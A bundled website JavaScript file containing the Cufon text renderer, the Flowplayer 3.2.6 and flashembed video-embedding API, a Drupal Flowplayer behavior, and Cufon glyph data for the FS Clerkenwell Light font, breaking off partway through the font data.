Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/* 
 * flowplayer.js 3.2.6. The Flowplayer API
 * 
 * Copyright 2009-2011 Flowplayer Oy
 * 
 * This file is part of Flowplayer.
 * 
 * Flowplayer is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * Flowplayer is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with Flowplayer.  If not, see <http://www.gnu.org/licenses/>.
 * 
 * Date: 2011-02-04 05:45:28 -0500 (Fri, 04 Feb 2011)
 * Revision: 614 
 */
(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){return q}if(q&&p){m(p,function(r,s){if(!o||typeof s!="function"){q[r]=s}})}return q}function n(s){var q=s.indexOf(".");if(q!=-1){var p=s.slice(0,q)||"*";var o=s.slice(q+1,s.length);var r=[];m(document.getElementsByTagName(p),function(){if(this.className&&this.className.indexOf(o)!=-1){r.push(this)}});return r}}function f(o){o=o||window.event;if(o.preventDefault){o.stopPropagation();o.preventDefault()}else{o.returnValue=false;o.cancelBubble=true}return false}function j(q,o,p){q[o]=q[o]||[];q[o].push(p)}function e(){return"_"+(""+Math.random()).slice(2,10)}var h=function(t,r,s){var q=this,p={},u={};q.index=r;if(typeof t=="string"){t={url:t}}i(this,t,true);m(("Begin*,Start,Pause*,Resume*,Seek*,Stop*,Finish*,LastSecond,Update,BufferFull,BufferEmpty,BufferStop").split(","),function(){var v="on"+this;if(v.indexOf("*")!=-1){v=v.slice(0,v.length-1);var w="onBefore"+v.slice(2);q[w]=function(x){j(u,w,x);return q}}q[v]=function(x){j(u,v,x);return q};if(r==-1){if(q[w]){s[w]=q[w]}if(q[v]){s[v]=q[v]}}});i(this,{onCuepoint:function(x,w){if(arguments.length==1){p.embedded=[null,x];return q}if(typeof x=="number"){x=[x]}var v=e();p[v]=[x,w];if(s.isLoaded()){s._api().fp_addCuepoints(x,r,v)}return q},update:function(w){i(q,w);if(s.isLoaded()){s._api().fp_updateClip(w,r)}var v=s.getConfig();var x=(r==-1)?v.clip:v.playlist[r];i(x,w,true)},_fireEvent:function(v,y,w,A){if(v=="onLoad"){m(p,function(B,C){if(C[0]){s._api().fp_addCuepoints(C[0],r,B)}});return false}A=A||q;if(v=="onCuepoint"){var z=p[y];if(z){return z[1].call(s,A,w)}}if(y&&"onBeforeBegin,onMetaData,onStart,onUpdate,onResume".indexOf(v)!=-1){i(A,y);if(y.metaData){if(!A.duration){A.duration=y.metaData.duration}else{A.fullDuration=y.metaData.duration}}}var x=true;m(u[v],function(){x=this.call(s,A,y,w)});return x}});if(t.onCuepoint){var o=t.onCuepoint;q.onCuepoint.apply(q,typeof o=="function"?[o]:o);delete t.onCuepoint}m(t,function(v,w){if(typeof w=="function"){j(u,v,w);delete t[v]}});if(r==-1){s.onCuepoint=this.onCuepoint}};var l=function(p,r,q,t){var o=this,s={},u=false;if(t){i(s,t)}m(r,function(v,w){if(typeof w=="function"){s[v]=w;delete r[v]}});i(this,{animate:function(y,z,x){if(!y){return o}if(typeof z=="function"){x=z;z=500}if(typeof y=="string"){var w=y;y={};y[w]=z;z=500}if(x){var v=e();s[v]=x}if(z===undefined){z=500}r=q._api().fp_animate(p,y,z,v);return o},css:function(w,x){if(x!==undefined){var v={};v[w]=x;w=v}r=q._api().fp_css(p,w);i(o,r);return o},show:function(){this.display="block";q._api().fp_showPlugin(p);return o},hide:function(){this.display="none";q._api().fp_hidePlugin(p);return o},toggle:function(){this.display=q._api().fp_togglePlugin(p);return o},fadeTo:function(y,x,w){if(typeof x=="function"){w=x;x=500}if(w){var v=e();s[v]=w}this.display=q._api().fp_fadeTo(p,y,x,v);this.opacity=y;return o},fadeIn:function(w,v){return o.fadeTo(1,w,v)},fadeOut:function(w,v){return o.fadeTo(0,w,v)},getName:function(){return p},getPlayer:function(){return q},_fireEvent:function(w,v,x){if(w=="onUpdate"){var z=q._api().fp_getPlugin(p);if(!z){return}i(o,z);delete o.methods;if(!u){m(z.methods,function(){var B=""+this;o[B]=function(){var C=[].slice.call(arguments);var D=q._api().fp_invoke(p,B,C);return D==="undefined"||D===undefined?o:D}});u=true}}var A=s[w];if(A){var y=A.apply(o,v);if(w.slice(0,1)=="_"){delete s[w]}return y}return o}})};function b(q,G,t){var w=this,v=null,D=false,u,s,F=[],y={},x={},E,r,p,C,o,A;i(w,{id:function(){return E},isLoaded:function(){return(v!==null&&v.fp_play!==undefined&&!D)},getParent:function(){return q},hide:function(H){if(H){q.style.height="0px"}if(w.isLoaded()){v.style.height="0px"}return w},show:function(){q.style.height=A+"px";if(w.isLoaded()){v.style.height=o+"px"}return w},isHidden:function(){return w.isLoaded()&&parseInt(v.style.height,10)===0},load:function(J){if(!w.isLoaded()&&w._fireEvent("onBeforeLoad")!==false){var H=function(){u=q.innerHTML;if(u&&!flashembed.isSupported(G.version)){q.innerHTML=""}if(J){J.cached=true;j(x,"onLoad",J)}flashembed(q,G,{config:t})};var I=0;m(a,function(){this.unload(function(K){if(++I==a.length){H()}})})}return w},unload:function(J){if(this.isFullscreen()&&/WebKit/i.test(navigator.userAgent)){if(J){J(false)}return w}if(u.replace(/\s/g,"")!==""){if(w._fireEvent("onBeforeUnload")===false){if(J){J(false)}return w}D=true;try{if(v){v.fp_close();w._fireEvent("onUnload")}}catch(H){}var I=function(){v=null;q.innerHTML=u;D=false;if(J){J(true)}};setTimeout(I,50)}else{if(J){J(false)}}return w},getClip:function(H){if(H===undefined){H=C}return F[H]},getCommonClip:function(){return s},getPlaylist:function(){return F},getPlugin:function(H){var J=y[H];if(!J&&w.isLoaded()){var I=w._api().fp_getPlugin(H);if(I){J=new l(H,I,w);y[H]=J}}return J},getScreen:function(){return w.getPlugin("screen")},getControls:function(){return w.getPlugin("controls")._fireEvent("onUpdate")},getLogo:function(){try{return w.getPlugin("logo")._fireEvent("onUpdate")}catch(H){}},getPlay:function(){return w.getPlugin("play")._fireEvent("onUpdate")},getConfig:function(H){return H?k(t):t},getFlashParams:function(){return G},loadPlugin:function(K,J,M,L){if(typeof M=="function"){L=M;M={}}var I=L?e():"_";w._api().fp_loadPlugin(K,J,M,I);var H={};H[I]=L;var N=new l(K,null,w,H);y[K]=N;return N},getState:function(){return w.isLoaded()?v.fp_getState():-1},play:function(I,H){var J=function(){if(I!==undefined){w._api().fp_play(I,H)}else{w._api().fp_play()}};if(w.isLoaded()){J()}else{if(D){setTimeout(function(){w.play(I,H)},50)}else{w.load(function(){J()})}}return w},getVersion:function(){var I="flowplayer.js 3.2.6";if(w.isLoaded()){var H=v.fp_getVersion();H.push(I);return H}return I},_api:function(){if(!w.isLoaded()){throw"Flowplayer "+w.id()+" not loaded when calling an API method"}return v},setClip:function(H){w.setPlaylist([H]);return w},getIndex:function(){return p},_swfHeight:function(){return v.clientHeight}});m(("Click*,Load*,Unload*,Keypress*,Volume*,Mute*,Unmute*,PlaylistReplace,ClipAdd,Fullscreen*,FullscreenExit,Error,MouseOver,MouseOut").split(","),function(){var H="on"+this;if(H.indexOf("*")!=-1){H=H.slice(0,H.length-1);var I="onBefore"+H.slice(2);w[I]=function(J){j(x,I,J);return w}}w[H]=function(J){j(x,H,J);return w}});m(("pause,resume,mute,unmute,stop,toggle,seek,getStatus,getVolume,setVolume,getTime,isPaused,isPlaying,startBuffering,stopBuffering,isFullscreen,toggleFullscreen,reset,close,setPlaylist,addClip,playFeed,setKeyboardShortcutsEnabled,isKeyboardShortcutsEnabled").split(","),function(){var H=this;w[H]=function(J,I){if(!w.isLoaded()){return w}var K=null;if(J!==undefined&&I!==undefined){K=v["fp_"+H](J,I)}else{K=(J===undefined)?v["fp_"+H]():v["fp_"+H](J)}return K==="undefined"||K===undefined?w:K}});w._fireEvent=function(Q){if(typeof Q=="string"){Q=[Q]}var R=Q[0],O=Q[1],M=Q[2],L=Q[3],K=0;if(t.debug){g(Q)}if(!w.isLoaded()&&R=="onLoad"&&O=="player"){v=v||c(r);o=w._swfHeight();m(F,function(){this._fireEvent("onLoad")});m(y,function(S,T){T._fireEvent("onUpdate")});s._fireEvent("onLoad")}if(R=="onLoad"&&O!="player"){return}if(R=="onError"){if(typeof O=="string"||(typeof O=="number"&&typeof M=="number")){O=M;M=L}}if(R=="onContextMenu"){m(t.contextMenu[O],function(S,T){T.call(w)});return}if(R=="onPluginEvent"||R=="onBeforePluginEvent"){var H=O.name||O;var I=y[H];if(I){I._fireEvent("onUpdate",O);return I._fireEvent(M,Q.slice(3))}return}if(R=="onPlaylistReplace"){F=[];var N=0;m(O,function(){F.push(new h(this,N++,w))})}if(R=="onClipAdd"){if(O.isInStream){return}O=new h(O,M,w);F.splice(M,0,O);for(K=M+1;K<F.length;K++){F[K].index++}}var P=true;if(typeof O=="number"&&O<F.length){C=O;var J=F[O];if(J){P=J._fireEvent(R,M,L)}if(!J||P!==false){P=s._fireEvent(R,M,L,J)}}m(x[R],function(){P=this.call(w,O,M);if(this.cached){x[R].splice(K,1)}if(P===false){return false}K++});return P};function B(){if($f(q)){$f(q).getParent().innerHTML="";p=$f(q).getIndex();a[p]=w}else{a.push(w);p=a.length-1}A=parseInt(q.style.height,10)||q.clientHeight;E=q.id||"fp"+e();r=G.id||E+"_api";G.id=r;t.playerId=E;if(typeof t=="string"){t={clip:{url:t}}}if(typeof t.clip=="string"){t.clip={url:t.clip}}t.clip=t.clip||{};if(q.getAttribute("href",2)&&!t.clip.url){t.clip.url=q.getAttribute("href",2)}s=new h(t.clip,-1,w);t.playlist=t.playlist||[t.clip];var I=0;m(t.playlist,function(){var K=this;if(typeof K=="object"&&K.length){K={url:""+K}}m(t.clip,function(L,M){if(M!==undefined&&K[L]===undefined&&typeof M!="function"){K[L]=M}});t.playlist[I]=K;K=new h(K,I,w);F.push(K);I++});m(t,function(K,L){if(typeof L=="function"){if(s[K]){s[K](L)}else{j(x,K,L)}delete t[K]}});m(t.plugins,function(K,L){if(L){y[K]=new l(K,L,w)}});if(!t.plugins||t.plugins.controls===undefined){y.controls=new l("controls",null,w)}y.canvas=new l("canvas",null,w);u=q.innerHTML;function J(L){var K=w.hasiPadSupport&&w.hasiPadSupport();if(/iPad|iPhone|iPod/i.test(navigator.userAgent)&&!/.flv$/i.test(F[0].url)&&!K){return true}if(!w.isLoaded()&&w._fireEvent("onBeforeClick")!==false){w.load()}return f(L)}function H(){if(u.replace(/\s/g,"")!==""){if(q.addEventListener){q.addEventListener("click",J,false)}else{if(q.attachEvent){q.attachEvent("onclick",J)}}}else{if(q.addEventListener){q.addEventListener("click",f,false)}w.load()}}setTimeout(H,0)}if(typeof q=="string"){var z=c(q);if(!z){throw"Flowplayer cannot access element: "+q}q=z;B()}else{B()}}var a=[];function d(o){this.length=o.length;this.each=function(p){m(o,p)};this.size=function(){return o.length}}window.flowplayer=window.$f=function(){var p=null;var o=arguments[0];if(!arguments.length){m(a,function(){if(this.isLoaded()){p=this;return false}});return p||a[0]}if(arguments.length==1){if(typeof o=="number"){return a[o]}else{if(o=="*"){return new d(a)}m(a,function(){if(this.id()==o.id||this.id()==o||this.getParent()==o){p=this;return false}});return p}}if(arguments.length>1){var t=arguments[1],q=(arguments.length==3)?arguments[2]:{};if(typeof t=="string"){t={src:t}}t=i({bgcolor:"#000000",version:[9,0],expressInstall:"http://static.flowplayer.org/swf/expressinstall.swf",cachebusting:false},t);if(typeof o=="string"){if(o.indexOf(".")!=-1){var s=[];m(n(o),function(){s.push(new b(this,k(t),k(q)))});return new d(s)}else{var r=c(o);return new b(r!==null?r:o,t,q)}}else{if(o){return new b(o,t,q)}}}return null};i(window.$f,{fireEvent:function(){var o=[].slice.call(arguments);var q=$f(o[0]);return q?q._fireEvent(o.slice(1)):null},addPlugin:function(o,p){b.prototype[o]=p;return $f},each:m,extend:i});if(typeof jQuery=="function"){jQuery.fn.flowplayer=function(q,p){if(!arguments.length||typeof arguments[0]=="number"){var o=[];this.each(function(){var r=$f(this);if(r){o.push(r)}});return arguments.length?o[arguments[0]]:new d(o)}return this.each(function(){$f(this,k(q),p?k(p):{})})}}})();(function(){var e=typeof jQuery=="function";var i={width:"100%",height:"100%",allowfullscreen:true,allowscriptaccess:"always",quality:"high",version:null,onFail:null,expressInstall:null,w3c:false,cachebusting:false};if(e){jQuery.tools=jQuery.tools||{};jQuery.tools.flashembed={version:"1.0.4",conf:i}}function j(){if(c.done){return false}var l=document;if(l&&l.getElementsByTagName&&l.getElementById&&l.body){clearInterval(c.timer);c.timer=null;for(var k=0;k<c.ready.length;k++){c.ready[k].call()}c.ready=null;c.done=true}}var c=e?jQuery:function(k){if(c.done){return k()}if(c.timer){c.ready.push(k)}else{c.ready=[k];c.timer=setInterval(j,13)}};function f(l,k){if(k){for(key in k){if(k.hasOwnProperty(key)){l[key]=k[key]}}}return l}function g(k){switch(h(k)){case"string":k=k.replace(new RegExp('(["\\\\])',"g"),"\\$1");k=k.replace(/^\s?(\d+)%/,"$1pct");return'"'+k+'"';case"array":return"["+b(k,function(n){return g(n)}).join(",")+"]";case"function":return'"function()"';case"object":var l=[];for(var m in k){if(k.hasOwnProperty(m)){l.push('"'+m+'":'+g(k[m]))}}return"{"+l.join(",")+"}"}return String(k).replace(/\s/g," ").replace(/\'/g,'"')}function h(l){if(l===null||l===undefined){return false}var k=typeof l;return(k=="object"&&l.push)?"array":k}if(window.attachEvent){window.attachEvent("onbeforeunload",function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){}})}function b(k,n){var m=[];for(var l in k){if(k.hasOwnProperty(l)){m[l]=n(k[l])}}return m}function a(r,t){var q=f({},r);var s=document.all;var n='<object width="'+q.width+'" height="'+q.height+'"';if(s&&!q.id){q.id="_"+(""+Math.random()).substring(9)}if(q.id){n+=' id="'+q.id+'"'}if(q.cachebusting){q.src+=((q.src.indexOf("?")!=-1?"&":"?")+Math.random())}if(q.w3c||!s){n+=' data="'+q.src+'" type="application/x-shockwave-flash"'}else{n+=' classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'}n+=">";if(q.w3c||s){n+='<param name="movie" value="'+q.src+'" />'}q.width=q.height=q.id=q.w3c=q.src=null;for(var l in q){if(q[l]!==null){n+='<param name="'+l+'" value="'+q[l]+'" />'}}var o="";if(t){for(var m in t){if(t[m]!==null){o+=m+"="+(typeof t[m]=="object"?g(t[m]):t[m])+"&"}}o=o.substring(0,o.length-1);n+='<param name="flashvars" value=\''+o+"' />"}n+="</object>";return n}function d(m,p,l){var k=flashembed.getVersion();f(this,{getContainer:function(){return m},getConf:function(){return p},getVersion:function(){return k},getFlashvars:function(){return l},getApi:function(){return m.firstChild},getHTML:function(){return a(p,l)}});var q=p.version;var r=p.expressInstall;var o=!q||flashembed.isSupported(q);if(o){p.onFail=p.version=p.expressInstall=null;m.innerHTML=a(p,l)}else{if(q&&r&&flashembed.isSupported([6,65])){f(p,{src:r});l={MMredirectURL:location.href,MMplayerType:"PlugIn",MMdoctitle:document.title};m.innerHTML=a(p,l)}else{if(m.innerHTML.replace(/\s/g,"")!==""){}else{m.innerHTML="<h2>Flash version "+q+" or greater is required</h2><h3>"+(k[0]>0?"Your version is "+k:"You have no flash plugin installed")+"</h3>"+(m.tagName=="A"?"<p>Click here to download latest version</p>":"<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a></p>");if(m.tagName=="A"){m.onclick=function(){location.href="http://www.adobe.com/go/getflashplayer"}}}}}if(!o&&p.onFail){var n=p.onFail.call(this);if(typeof n=="string"){m.innerHTML=n}}if(document.all){window[p.id]=document.getElementById(p.id)}}window.flashembed=function(l,m,k){if(typeof l=="string"){var n=document.getElementById(l);if(n){l=n}else{c(function(){flashembed(l,m,k)});return}}if(!l){return}if(typeof m=="string"){m={src:m}}var o=f({},i);f(o,m);return new d(l,o,k)};f(window.flashembed,{getVersion:function(){var m=[0,0];if(navigator.plugins&&typeof navigator.plugins["Shockwave Flash"]=="object"){var l=navigator.plugins["Shockwave Flash"].description;if(typeof l!="undefined"){l=l.replace(/^.*\s+(\S+\s+\S+$)/,"$1");var n=parseInt(l.replace(/^(.*)\..*$/,"$1"),10);var r=/r/.test(l)?parseInt(l.replace(/^.*r(.*)$/,"$1"),10):0;m=[n,r]}}else{if(window.ActiveXObject){try{var p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7")}catch(q){try{p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");m=[6,0];p.AllowScriptAccess="always"}catch(k){if(m[0]==6){return m}}try{p=new ActiveXObject("ShockwaveFlash.ShockwaveFlash")}catch(o){}}if(typeof p=="object"){l=p.GetVariable("$version");if(typeof l!="undefined"){l=l.replace(/^\S+\s+(.*)$/,"$1").split(",");m=[parseInt(l[0],10),parseInt(l[2],10)]}}}}return m},isSupported:function(k){var m=flashembed.getVersion();var l=(m[0]>k[0])||(m[0]==k[0]&&m[1]>=k[1]);return l},domReady:c,asString:g,getHTML:a});if(e){jQuery.fn.flashembed=function(l,k){var m=null;this.each(function(){m=flashembed(this,l,k)});return l.api===false?this:m}}})();;
// $Id: flowplayer.js,v 1.1.2.6 2009/11/19 21:33:48 robloach Exp $

/**
 * @file
 * Provides the FlowPlayer Drupal behavior.
 */

/**
 * The FlowPlayer Drupal behavior that creates the set of FlowPlayer elements from Drupal.settings.flowplayer.
 */
Drupal.behaviors.flowplayer = function() {
  jQuery.each(Drupal.settings.flowplayer, function(selector, config) {

    // Convert any player object events to JavaScript calls.
    var playerEvents = [
      'onBeforeClick',
      'onLoad',
      'onBeforeLoad',
      'onUnload',
      'onBeforeUnload',
      'onMouseOver',
      'onMouseOut',
      'onKeypress',
      'onBeforeKeypress',
      'onVolume',
      'onBeforeVolume',
      'onMute',
      'onBeforeMute',
      'onUnmute',
      'onBeforeUnmute',
      'onFullscreen',
      'onBeforeFullscreen',
      'onFullscreenExit',
      'onPlaylistReplace',
      'onError'
    ];
    jQuery.each(playerEvents, function(index, event) {
      if (typeof(config[event]) == 'string') {
        config[event] = eval(config[event]);
      }
    });

    // Convert any clip object events to JavaScript events.
    var clipEvents = [
      'onBegin',
      'onBeforeBegin',
      'onMetaData',
      'onStart',
      'onPause',
      'onBeforePause',
      'onResume',
      'onBeforeResume',
      'onSeek',
      'onBeforeSeek',
      'onStop',
      'onBeforeStop',
      'onFinish',
      'onBeforeFinish',
      'onLastSecond',
      'onUpdate'
    ];
    if (config['clip']) {
      jQuery.each(clipEvents, function(index, event) {
        if (typeof(config['clip'][event]) == 'string') {
          config['clip'][event] = eval(config['clip'][event]);
        }
      });
    }

    // Register the playlist clip events.
    if (config['playlist']) {
      jQuery.each(config['playlist'], function(index, clip) {
        jQuery.each(clipEvents, function(e_index, event) {
          if (typeof(config['playlist'][index][event]) == 'string') {
            config['playlist'][index][event] = eval(config['playlist'][index][event]);
          }
        });
      });
    }

    // Register the onCuepoint callback.
    if (config['clip'] && config['clip']['onCuepoint'] && typeof(config['clip']['onCuepoint'][1]) == 'string') {
      config['clip']['onCuepoint'][1] = eval(config['clip']['onCuepoint'][1]);
    }

    // Create the flowplayer element on the non-processed elements.
    $(selector + ':not(.flowplayer-processed)').addClass('flowplayer-processed').flowplayer(Drupal.settings.basePath + Drupal.settings.flowplayerSwf, config);
  });
};
;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 2009 by Fontsmith Ltd. All rights reserved.
 * 
 * Trademark:
 * FS Clerkenwell Light is a trademark of Fontsmith Ltd.
 * 
 * Full name:
 * FSClerkenwell-Light
 * 
 * Description:
 * Copyright (c) 2009 by Fontsmith Ltd. All rights reserved.
 * 
 * Manufacturer:
 * Fontsmith Ltd
 * 
 * Designer:
 * Phil Garnham and Jason Smith
 * 
 * Vendor URL:
 * http://www.fontsmith.com/
 * 
 * License information:
 * http://www.fontsmith.com
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"55,-146v27,-34,97,-34,97,30r0,96v-2,8,11,6,18,6r0,14r-57,0r0,-14r17,0r0,-99v6,-54,-59,-39,-75,-13r0,106v-2,8,11,6,18,6r0,14r-58,0r0,-14r18,0r0,-217r-20,0r-3,-15v21,0,25,-1,36,-1v6,0,9,2,9,8r0,93","w":182},{"d":"55,-146v27,-34,98,-34,98,30r0,96v-2,8,11,6,18,6r0,14r-58,0r0,-14r18,0r0,-99v6,-54,-59,-39,-76,-13r0,106v-1,8,11,6,19,6r0,14r-58,0r0,-14r18,0r0,-137r-20,0r-3,-14v21,0,25,-2,36,-2v11,-1,8,12,8,21","w":183},{"d":"159,-63r-39,0v1,23,-11,56,28,47r0,16r-78,0r0,-16r28,0r0,-47r-92,0r0,-14r96,-145r18,0r0,141r39,0r0,18xm98,-81r0,-104r-69,104r69,0"},{"d":"148,-126v0,97,-47,147,-119,124r4,-15v52,17,83,-22,89,-79v-41,36,-105,29,-105,-50v0,-42,21,-80,65,-80v37,0,66,24,66,100xm124,-116v5,-57,-14,-101,-42,-94v-27,0,-42,26,-42,64v0,69,53,60,84,30"},{"d":"150,-111v0,89,-28,115,-66,115v-38,0,-65,-25,-65,-114v0,-89,28,-116,66,-116v38,0,65,26,65,115xm127,-111v0,-74,-15,-97,-42,-97v-27,0,-43,23,-43,97v0,74,16,97,43,97v27,0,42,-23,42,-97"},{"d":"16,-80v0,-66,50,-113,104,-78r0,-73r-20,0r-2,-15v20,0,25,-1,36,-1v6,0,8,2,8,8r0,218v-2,9,12,7,20,7r0,14v-17,-1,-40,4,-41,-12v-9,9,-25,17,-41,17v-46,0,-64,-38,-64,-85xm120,-139v-40,-33,-81,-4,-81,58v0,68,47,88,81,52r0,-110","w":171},{"d":"108,-172v1,-40,-50,-40,-80,-26r-5,-17v43,-23,108,-10,108,41v0,22,-9,44,-31,52v68,19,43,126,-29,126v-19,0,-40,-6,-56,-16r9,-18v35,27,93,17,93,-36v0,-27,-19,-43,-49,-45r0,-17v28,-3,40,-21,40,-44"},{"d":"18,-222v76,-2,159,-8,156,65v-2,59,-43,72,-113,68r0,65v-1,10,11,8,20,8r0,16r-62,0r0,-16r19,0r0,-180v2,-11,-10,-10,-20,-10r0,-16xm61,-105v55,3,89,-5,89,-52v0,-47,-40,-51,-89,-49r0,101","w":184},{"d":"42,-111v0,9,-6,16,-15,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,15,7,15,16xm43,-9v0,17,-9,32,-24,50r-8,-5v6,-10,14,-24,15,-32v-8,-1,-15,-6,-15,-15v0,-8,5,-16,15,-16v11,0,17,8,17,18","w":56},{"d":"128,-246r-113,268r-20,0r113,-268r20,0","w":119},{"d":"136,-22v-39,49,-121,30,-121,-60v0,-78,61,-110,104,-72r2,-11r13,0r0,53v-12,1,-19,-1,-18,-14v-3,-17,-15,-27,-33,-27v-28,0,-45,24,-45,71v0,71,53,88,89,50","w":149},{"d":"111,-226v54,0,69,39,64,96v13,1,34,-7,29,15r-29,0v3,40,-15,114,37,101r0,14v-27,1,-53,-1,-56,-23v-27,45,-126,34,-126,-38v0,-29,18,-54,46,-62v-55,-23,-28,-103,35,-103xm102,-13v61,2,52,-70,52,-133v0,-36,-8,-64,-44,-64v-24,0,-42,15,-42,41v0,26,18,41,47,39v-1,6,4,18,-6,15v-34,0,-56,21,-56,53v0,29,18,49,49,49","w":231},{"d":"42,-111v0,9,-6,16,-15,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,15,7,15,16xm42,-12v0,9,-6,16,-15,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,15,7,15,16","w":55},{"d":"168,0r-148,0v-1,-13,6,-24,11,-32r107,-172r-85,0v-16,-1,-9,23,-14,34r-15,0r0,-52r142,0v0,13,-1,14,-13,34r-104,171r91,0v16,0,10,-23,14,-35r14,0r0,52","w":183},{"d":"165,0r-56,0r0,-14r12,0r-45,-78r-21,23r0,48v-2,8,10,7,18,7r0,14r-58,0r0,-14r18,0r0,-217r-20,0r-3,-15v20,0,25,-1,36,-1v6,0,9,2,9,8r0,148v21,-24,48,-47,65,-74r37,0r0,14v-36,-6,-46,26,-66,43r49,85v4,9,12,9,25,9r0,14","w":167},{"d":"85,-208v0,19,-7,57,-10,78r-6,0v-3,-21,-10,-59,-10,-78v0,-12,5,-18,13,-18v8,0,13,6,13,18xm37,-208v0,19,-7,57,-10,78r-6,0v-3,-21,-10,-59,-10,-78v0,-12,5,-18,13,-18v8,0,13,6,13,18","w":102},{"d":"157,0r-58,0r0,-14v8,1,18,-1,11,-10r-30,-43r-29,53r15,0r0,14r-58,0r0,-14v13,0,25,2,30,-8r31,-59r-49,-70r-17,0r0,-14r59,0v0,7,3,17,-7,14v-7,0,-8,5,-5,11r31,42r29,-53r-14,0r0,-14r57,0r3,14v-16,1,-27,-3,-34,10r-31,57r49,70r17,0r0,14","w":159},{"d":"231,-151v-11,1,-22,-3,-25,8r-40,143r-23,0r-32,-128r-37,128r-23,0r-37,-151r-16,0r0,-14r56,0r0,14v-9,0,-21,-3,-18,10r29,115r40,-139r17,0r35,141r34,-127r-14,0r0,-14r52,0","w":225,"k":{"t":4,"f":1,"A":8}},{"d":"139,-79r-100,0v0,40,12,67,45,67v18,0,33,-10,44,-22r9,9v-39,53,-122,35,-122,-56v0,-50,23,-89,65,-89v42,0,61,36,59,91xm117,-93v0,-38,-12,-61,-37,-61v-24,0,-39,25,-41,61r78,0","w":153},{"d":"80,-174v1,-38,-43,-43,-75,-30r0,-15v41,-15,102,-7,98,43v6,31,-54,76,-56,111r-10,0v0,-38,42,-71,43,-109xm59,-12v0,9,-7,16,-16,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,16,7,16,16","w":114},{"d":"54,-150v48,-43,109,-9,105,65v-3,54,-15,90,-64,90v-17,0,-33,-7,-41,-19r0,78v1,20,-24,16,-43,16r0,-14v9,-1,21,3,21,-7r0,-210r-20,0r-3,-14v20,0,25,-2,36,-2v10,0,9,8,9,17xm54,-132v1,52,-12,121,40,121v32,0,43,-31,43,-74v0,-35,-8,-65,-40,-67v-15,0,-31,8,-43,20","w":175},{"d":"109,65r-4,7v-45,-21,-74,-76,-74,-158v0,-82,29,-136,74,-157r4,6v-69,45,-68,257,0,302","w":105},{"d":"89,-80v-47,6,-37,49,-37,92v0,45,-11,66,-56,68r0,-7v41,0,26,-47,26,-82v0,-32,2,-65,42,-73v-58,-14,-37,-75,-37,-125v0,-21,-12,-29,-31,-31r0,-7v62,-2,54,54,54,111v0,24,9,45,39,49r0,5","w":99},{"d":"120,-63r-99,-40r0,-17r99,-44r0,19r-77,33r77,30r0,19","w":140},{"d":"162,-162v-32,6,-3,-44,-39,-44r-62,0r0,84r53,0v3,-8,1,-24,15,-21r0,59v-13,3,-12,-12,-16,-21r-52,0r0,81v0,11,11,7,20,8r0,16r-62,0r0,-16r19,0r0,-181v1,-12,-10,-9,-20,-9r0,-16r142,0","w":173,"k":{"J":3,"A":18,"a":9,"e":9,"o":8}},{"d":"18,-222v65,1,146,-11,143,52v0,21,-10,40,-29,49v28,9,42,29,42,58v0,38,-22,63,-72,63r-83,0r0,-16r19,0r0,-181v2,-10,-10,-9,-20,-9r0,-16xm138,-168v0,-44,-38,-38,-77,-38r0,79v4